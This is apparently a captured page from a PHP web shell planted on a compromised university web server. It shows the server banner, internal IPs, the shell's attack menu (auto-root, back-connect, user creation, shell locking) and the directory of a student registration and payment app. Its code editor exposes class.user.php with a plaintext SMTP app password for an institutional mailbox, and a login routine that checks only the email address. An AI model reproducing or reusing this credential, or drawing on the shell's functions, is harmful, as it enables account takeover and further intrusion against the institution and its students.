Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
conreg /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
bower_components
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
documents
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
uploadDoc
[ DIR ]
drwxr-xr-x
validation
[ DIR ]
drwxr-xr-x
404.php
2.86
KB
-rw-r--r--
changePassword.php
4.67
KB
-rw-r--r--
class.user.php
3.69
KB
-rw-r--r--
common-oldbkp.php
5.19
KB
-rw-r--r--
common.php
5.99
KB
-rw-r--r--
config.php
296
B
-rw-r--r--
dashboard.php
7.11
KB
-rw-r--r--
dbconfig.php
1.31
KB
-rw-r--r--
error_log
5.69
KB
-rw-r--r--
forgotPassword.php
5.28
KB
-rw-r--r--
fpass.php
3.11
KB
-rw-r--r--
google_auth.php
2.06
KB
-rw-r--r--
index-login-bkp.php
5.62
KB
-rw-r--r--
index.php
11.97
KB
-rw-r--r--
logout.php
645
B
-rw-r--r--
logoutgmail.php
977
B
-rw-r--r--
page-top.php
5.8
KB
-rw-r--r--
pay-bkp15722.php
8.49
KB
-rw-r--r--
pay-oldbkp.php
5.39
KB
-rw-r--r--
pay.php
5.15
KB
-rw-r--r--
payNow-oldbkp.php
7.07
KB
-rw-r--r--
payNow.php
7.13
KB
-rw-r--r--
payNowLink-bkp15722.php
10.56
KB
-rw-r--r--
payNowLink.php
8.1
KB
-rw-r--r--
paymentlinkcn.php
7.95
KB
-rw-r--r--
paymentlinkcoa.php
8.33
KB
-rw-r--r--
paymentlinkcyber.php
7.95
KB
-rw-r--r--
paymentlinkdm.php
7.95
KB
-rw-r--r--
paymentlinkds.php
7.95
KB
-rw-r--r--
paymentlinkip.php
8.31
KB
-rw-r--r--
paymentlinkml.php
8.28
KB
-rw-r--r--
paymentlinkos.php
8.28
KB
-rw-r--r--
personalInformations-bkp15722....
16.31
KB
-rw-r--r--
personalInformations.php
19.12
KB
-rw-r--r--
register.php
18.78
KB
-rw-r--r--
registrationVerify.php
2.5
KB
-rw-r--r--
resetpass.php
5.27
KB
-rw-r--r--
verify-bkp15722.php
12.67
KB
-rw-r--r--
verify-oldbkp.php
7.15
KB
-rw-r--r--
verify.php
9.26
KB
-rw-r--r--
viewStudentDetails.php
18.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class.user.php
<?php require_once 'dbconfig.php'; class USER { private $conn; public function __construct() { $database = new Database(); $db = $database->dbConnection(); $this->conn = $db; } public function runQuery( $sql ) { $stmt = $this->conn->prepare( $sql ); return $stmt; } public function lasdID() { $stmt = $this->conn->lastInsertId(); return $stmt; } public function register( $studentName, $studentEmail, $studentMobile, $Degree, $studentrollnumber, $receivingType, $comingwith, $studentPassword, $gName1, $gemail1, $gName2, $gemail2, $regDate, $tokenCode ) { try { //$studentPassword = hash( 'sha256', $studentPassword ); //$studentPassword = "NA"; $studentPassword = trim( $_POST[ 'dropp' ] ); // added by ankit on 15th sep 23 $stmt = $this->conn->prepare( "INSERT INTO studentregistration(studentName,studentEmail,studentMobile,Degree,studentrollnumber,receivingType, comingwith,studentPassword,gName1,gemail1,gName2,gemail2,regDate,tokenCode) VALUES(:studentName1, :studentEmail1, :studentMobile1,:Degree1, :studentrollnumber1, :receivingType1, :comingwith1,:studentPassword1,:gName11,:gemail11,:gName21,:gemail21, :regDate1, :tokenCode1)" ); $stmt->bindparam( ":studentName1", $studentName ); $stmt->bindparam( ":studentEmail1", $studentEmail ); $stmt->bindparam( ":studentMobile1", $studentMobile ); $stmt->bindparam( ":Degree1", $Degree ); $stmt->bindparam( ":studentrollnumber1", $studentrollnumber ); $stmt->bindparam( ":receivingType1", $receivingType ); $stmt->bindparam( ":comingwith1", $comingwith ); $stmt->bindparam( ":studentPassword1", $studentPassword ); $stmt->bindparam( ":gName11", $gName1 ); $stmt->bindparam( ":gemail11", $gemail1 ); $stmt->bindparam( ":gName21", $gName2 ); $stmt->bindparam( ":gemail21", $gemail2 ); $stmt->bindparam( ":regDate1", $regDate ); $stmt->bindparam( ":tokenCode1", $tokenCode ); $stmt->execute(); return $stmt; } catch ( PDOException $ex ) { echo $ex->getMessage(); } } public function login( $studentEmail ) { try { $stmt = $this->conn->prepare( "SELECT * FROM graduated25 WHERE studentEmail=:studentEmail" ); $stmt->execute( array( ":studentEmail" => $studentEmail ) ); $userRow = $stmt->fetch( PDO::FETCH_ASSOC ); if ( $userRow['studentEmail'] == $studentEmail ) { $_SESSION['studentEmail'] = $userRow['studentEmail']; //header( "Location: index.php" ); return true; } else { header( "Location: index.php?error" ); exit; } } catch ( PDOException $ex ) { echo $ex->getMessage(); } } public function is_logged_in() { if ( isset( $_SESSION[ 'username' ] ) ) { return true; } } public function redirect( $url ) { header( "Location: $url" ); } public function logout() { session_destroy(); $_SESSION[ 'username' ] = false; $_SESSION[ 'studentIDSession' ] = false; } function send_mail( $email, $message, $subject ) { require_once( 'mailer/class.phpmailer.php' ); $mail = new PHPMailer(); $mail->IsSMTP(); $mail->SMTPDebug = 0; $mail->SMTPAuth = true; $mail->SMTPSecure = "ssl"; $mail->Host = "smtp.gmail.com"; $mail->Port = 587; $mail->AddAddress( $email ); $mail->SMTPSecure = "tls"; $mail->Username = "no-reply@iiitd.ac.in"; //$mail->Password = "noreply@iiitd"; //Password = "noreply@iiitd"; $mail->Password = "trwn ljvy brjw qgxx"; $mail->SetFrom( 'no-reply@iiitd.ac.in', 'IIIT-Delhi' ); $mail->AddReplyTo( "admin-web@iiitd.ac.in", "IIIT-Delhi" ); $mail->Subject = $subject; $mail->MsgHTML( $message ); $mail->Send(); } }
Close